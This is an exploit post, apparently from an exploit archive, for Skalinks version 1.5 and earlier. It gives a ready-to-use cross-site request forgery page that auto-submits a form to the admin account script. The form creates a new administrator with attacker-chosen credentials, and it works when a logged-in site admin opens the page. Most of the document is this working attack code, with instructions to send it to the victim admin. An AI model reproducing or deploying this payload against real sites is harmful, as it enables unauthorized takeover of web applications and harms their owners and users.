Skalinks <= 1_5 Cross Site Request Forgery Add Admin
##########################################################################
# _ _ _ _ _____ _ _ #
# | | | | | | (_) |_ _| (_) | | #
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #
# __/ | #
# |___/ #
#________________________________________________________________________#
| |
| Site: www.hackinginside.altervista.org |
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |
| Author: Vincy |
| Email: djvincy@xxxxxxxxxx |
|________________________________________________________________________|
This code, must be saved in a HTML page and sended to the site admin. So the
admin will add a new admin in the mySQL with that info.
It work only if admin's logged.
-------------------------------------------------------------------------------------------
<form action="http://site.com/path/admin/admin_account.php"; name="add_admin"
method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
-------------------------------------------------------------------------------------------
# Vincy - Hacking Inside Crew